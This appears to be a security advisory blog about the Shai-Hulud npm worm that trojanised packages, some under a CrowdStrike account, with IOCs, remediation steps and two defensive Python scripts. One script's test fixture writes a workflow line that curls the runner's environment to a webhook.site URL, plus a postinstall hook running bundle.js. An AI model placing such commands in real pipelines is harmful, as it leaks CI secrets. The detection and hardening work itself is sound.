Insight Type: Blog
Maidar Secure Advisory: CrowdStrike incident

Executive Summary

On 16 September 2025, multiple security researchers and publications reported a software-supply-chain incident (tracked as Shai-Hulud) in which a self-propagating, credential-stealing worm (delivered as a bundle.js file) was injected into dozens to hundreds of npm packages, including some packages published under a CrowdStrike npm account. The malicious packages exfiltrate credentials and propagate by publishing further compromised packages. The campaign briefly used the crowdstrike-publisher npm account to publish trojanised packages; CrowdStrike removed those versions and rotated its public registry keys.

What Happened, Confirmed Impacted Elements and IOCs

  • A malicious package, believed to have been first trojanised on 14 Sept 2025 at 17:58 UTC, was used as the initial vector. Its payload runs TruffleHog to search the host's filesystem and cloud metadata endpoints for secrets, then exfiltrates or abuses the tokens it finds. The malware runs on Linux and macOS and targets developer and CI contexts.
  • The malware is self-replicating and credential-stealing: every install can harvest credentials and publish further infected packages.

  • Commonly stolen secrets: GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY, and other CI secrets and personal access tokens (PATs).
  • Exfiltration/staging indicators: creation of public GitHub repositories with "Shai-Hulud" in the repository name (used to publish stolen secrets), and creation of unauthorised .github/workflows/* GitHub Actions YAML files that perform the exfiltration steps.
  • Known attacker behaviour: validation of stolen tokens via GitHub "whoami"-style endpoints, calls to GitHub APIs, and contact with remote webhook endpoints (reports reference webhook[.]site and attacker-controlled webhooks used as exfiltration sinks).
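The indicators above can be hunted for on a checked-out project or a CI runner without any vendor tooling. The following script is an added example (not Maidar Secure's or CrowdStrike's code): it walks a directory tree looking for a package whose install hook runs a bundle.js, and for workflow files under .github/workflows whose name or body carries a "Shai-Hulud" or webhook[.]site string, and it filters a list of repository names for the worm's public staging repos. The sample tree it scans is constructed inline; the package name "evil-pkg", the "clean-lib" package and the webhook URL are placeholders, not real indicators.

```python
"""Hunt for Shai-Hulud-style install-hook and workflow indicators.

Added example, not Maidar Secure's or CrowdStrike's tooling. The fixture
tree built by build_sample_tree() is constructed for the demo.
"""
import json
import os
import re
import tempfile

HOOK_NAMES = ("preinstall", "install", "postinstall")
# The worm ran from a bundle.js dropped into the trojanised package and was
# triggered at install time (hence "every install can harvest credentials").
HOOK_PATTERN = re.compile(r"\bbundle\.js\b", re.IGNORECASE)
# Strings the advisory lists as staging / exfiltration indicators.
IOC_PATTERN = re.compile(r"shai-hulud|webhook\.site", re.IGNORECASE)


def scan_package_json(path, label):
    """Return a finding if this manifest wires bundle.js into an install hook."""
    with open(path, encoding="utf-8") as fh:
        try:
            manifest = json.load(fh)
        except json.JSONDecodeError:
            return None  # unreadable manifest; not an install-hook finding
    scripts = manifest.get("scripts") or {}
    for hook in HOOK_NAMES:
        cmd = scripts.get(hook)
        if isinstance(cmd, str) and HOOK_PATTERN.search(cmd):
            name = manifest.get("name", label)
            return f"{name}@{manifest.get('version', '?')}: {hook} runs {cmd!r}"
    return None


def scan_workflow(path, label):
    """Return a finding if a workflow's file name or body carries an IOC string."""
    with open(path, encoding="utf-8") as fh:
        body = fh.read()
    hit = IOC_PATTERN.search(label) or IOC_PATTERN.search(body)
    return f"{label}: workflow references {hit.group(0)!r}" if hit else None


def hunt(root):
    """Walk root and return a sorted list of findings (paths relative to root)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        in_workflows = dirpath.endswith(os.path.join(".github", "workflows"))
        for name in files:
            full = os.path.join(dirpath, name)
            label = os.path.relpath(full, root)
            if name == "package.json":
                finding = scan_package_json(full, label)
            elif in_workflows and name.endswith((".yml", ".yaml")):
                finding = scan_workflow(full, label)
            else:
                continue
            if finding:
                findings.append(finding)
    return sorted(findings)


def suspicious_repos(repo_names):
    """Filter repository names (e.g. from `gh repo list --json name`) for the
    public staging repos the worm created."""
    return [r for r in repo_names if "shai-hulud" in r.lower()]


def build_sample_tree(root):
    """Constructed fixture: one clean package, one trojanised package, one
    clean workflow and one rogue workflow that posts the runner's environment
    to a webhook sink. None of these are real packages or indicators."""
    def write(rel, content):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)

    write("node_modules/clean-lib/package.json", json.dumps(
        {"name": "clean-lib", "version": "1.3.0", "scripts": {"test": "node test.js"}}))
    write("node_modules/evil-pkg/package.json", json.dumps(
        {"name": "evil-pkg", "version": "4.1.2", "scripts": {"postinstall": "node bundle.js"}}))
    write("node_modules/evil-pkg/bundle.js", "// placeholder, not the real payload\n")
    write(".github/workflows/ci.yml",
          "name: ci\non: push\njobs:\n  build:\n    steps:\n      - run: npm ci\n")
    write(".github/workflows/deploy.yml",
          "name: deploy\non: push\njobs:\n  run:\n    steps:\n"
          "      - run: curl -sS -X POST https://webhook.site/EXAMPLE -d \"$(env)\"\n")


def demo():
    """Scan the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return hunt(tmp)


if __name__ == "__main__":
    for line in demo():
        print(line)
    print(suspicious_repos(["infra-tools", "Shai-Hulud", "shai-hulud-migration"]))
```

Run hunt() against the root of each repository checkout and against the workspace directories of CI runners; a hit on an install hook is a reason to treat the host as compromised and rotate its credentials, not just to remove the package, because the hook has already executed by the time you see it.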

Likely Adversary behaviour:

  • Initial access: compromise of npm publisher account(s), or of a maintainer environment holding npm credentials.
  • Payload: self-propagating JavaScript that harvests credentials found on the host, searches for local npm credentials or tokens, and uses the discovered credentials to publish additional infected packages.
  • Propagation: uses the npm publishing APIs and GitHub APIs to publish new packages or updated package tarballs.
  • Data exfiltration: secrets, tokens, and possibly environment variables or credential files on developer machines and CI runners.

Containment & Eradication (recommended)

  • If you use any affected packages: immediately remove them or pin to known-good versions (downgrade, or install from a local clean cache or artifact store). Removing the package does not undo what its install hook already did on the host.
  • Rebuild: wipe and rebuild compromised developer workstations and CI runners from known-good images. Do not rely on in-place remediation for suspect hosts.
  • Registry account hygiene: for any internal or third-party publisher accounts your organisation uses, enforce MFA, rotate publish tokens, and review account access logs.
  • Rotate all potentially exposed credentials now: rotate or revoke any secret that may have been present on developer machines or CI runners during the affected window, including npm tokens, GitHub PATs and Actions secrets, and cloud provider keys (AWS, Azure, GCP). Treat tokens as compromised until proven otherwise.

Recovery & hardening

  • Harden developer machines and CI: restrict access to secrets in local environments, avoid storing PATs in plain environment variables on developer devices, and move build secrets into a secrets manager that is accessible only at build time.
  • Use signed packages where possible, and verify package integrity via lockfiles and checksums: install from a committed lockfile that records integrity hashes (npm ci rather than npm install), so that a newly republished version of a pinned package is not silently pulled in.
  • Add SBOM generation to CI, and automatically scan newly published package versions before they are allowed into builds.
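The lockfile-and-checksum control above (and the "pin to known-good versions" containment step) relies on the Subresource Integrity hashes that package-lock.json records for every dependency. The following script is an added example (not Maidar Secure's tooling, and not what npm itself runs): it recomputes the SRI hash of each fetched tarball, compares it with the lockfile entry, and flags entries that carry no hash at all, which is the case that lets a republished version slip through. The lockfile and tarball bytes are constructed inline; "clean-lib", "evil-pkg" and "unpinned" are placeholder package names.

```python
"""Verify fetched npm tarballs against the SRI hashes in package-lock.json.

Added example, not Maidar Secure's tooling. SAMPLE_LOCK and the tarball
byte strings are constructed fixtures, not real packages.
"""
import base64
import hashlib
import hmac

# Strength ordering for the hash algorithms SRI allows; when a lockfile
# lists several space-separated hashes we check the strongest one.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_digest(data, algo="sha512"):
    """Compute an SRI string ("<algo>-<base64 digest>") for a byte string."""
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def strongest(integrity):
    """From a space-separated SRI list pick (algo, base64) of the strongest
    supported hash, or None if no supported algorithm is listed."""
    best = None
    for token in integrity.split():
        algo, _, b64 = token.partition("-")
        if algo in STRENGTH and (best is None or STRENGTH[algo] > STRENGTH[best[0]]):
            best = (algo, b64)
    return best


def verify_lockfile(lock, tarballs):
    """lock: parsed package-lock.json (lockfileVersion 2 or 3).
    tarballs: mapping of lockfile package path -> bytes that were actually fetched.
    Returns {package path: "ok" | "mismatch" | "no-integrity" | "missing"}."""
    results = {}
    for pkg_path, entry in lock.get("packages", {}).items():
        if pkg_path == "" or entry.get("link"):
            continue  # root project entry, or a workspace symlink with no tarball
        best = strongest(entry.get("integrity", ""))
        if best is None:
            results[pkg_path] = "no-integrity"  # nothing pins the tarball contents
            continue
        data = tarballs.get(pkg_path)
        if data is None:
            results[pkg_path] = "missing"  # lockfile entry with no fetched artifact
            continue
        algo, expected_b64 = best
        expected = f"{algo}-{expected_b64}"
        actual = sri_digest(data, algo)
        results[pkg_path] = "ok" if hmac.compare_digest(actual, expected) else "mismatch"
    return results


# Constructed fixtures: the tarball bytes that were actually downloaded.
CLEAN_TARBALL = b"clean-lib-1.3.0.tgz: constructed bytes"
TROJAN_TARBALL = b"evil-pkg-4.1.2.tgz: constructed bytes of a republished version"
UNPINNED_TARBALL = b"unpinned-0.1.0.tgz: constructed bytes"

# Constructed lockfile: clean-lib's hash matches what was fetched, evil-pkg's
# hash was recorded before the package was republished, unpinned has no hash.
SAMPLE_LOCK = {
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/clean-lib": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/clean-lib/-/clean-lib-1.3.0.tgz",
            "integrity": sri_digest(CLEAN_TARBALL),
        },
        "node_modules/evil-pkg": {
            "version": "4.1.2",
            "resolved": "https://registry.npmjs.org/evil-pkg/-/evil-pkg-4.1.2.tgz",
            "integrity": sri_digest(b"evil-pkg-4.1.2.tgz: the original, pre-republish bytes"),
        },
        "node_modules/unpinned": {
            "version": "0.1.0",
            "resolved": "https://registry.npmjs.org/unpinned/-/unpinned-0.1.0.tgz",
        },
    },
}

FETCHED = {
    "node_modules/clean-lib": CLEAN_TARBALL,
    "node_modules/evil-pkg": TROJAN_TARBALL,
    "node_modules/unpinned": UNPINNED_TARBALL,
}


if __name__ == "__main__":
    for pkg, status in sorted(verify_lockfile(SAMPLE_LOCK, FETCHED).items()):
        print(f"{status:13} {pkg}")
```

In a real pipeline the tarballs come from the npm cache or an internal artifact store rather than a dict, and any "mismatch" or "no-integrity" result should fail the build. npm ci performs the same hash check for packages it installs, but it cannot help with entries that were never given an integrity field, so a lockfile linter that rejects those is the piece worth adding.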

CrowdStrike Response

  • CrowdStrike confirmed detection of several malicious npm packages in the public registry, removed those packages and rotated keys in public registries, and stated that the Falcon sensor and platform are not impacted and customers remain protected; the investigation with npm is ongoing. Multiple security vendors (ReversingLabs, OX Security, StepSecurity, Aikido, Wiz) have analysed the campaign and warned of its worm-like self-propagation and of the attacker's goal of token and cloud-credential theft and automated downstream compromise.
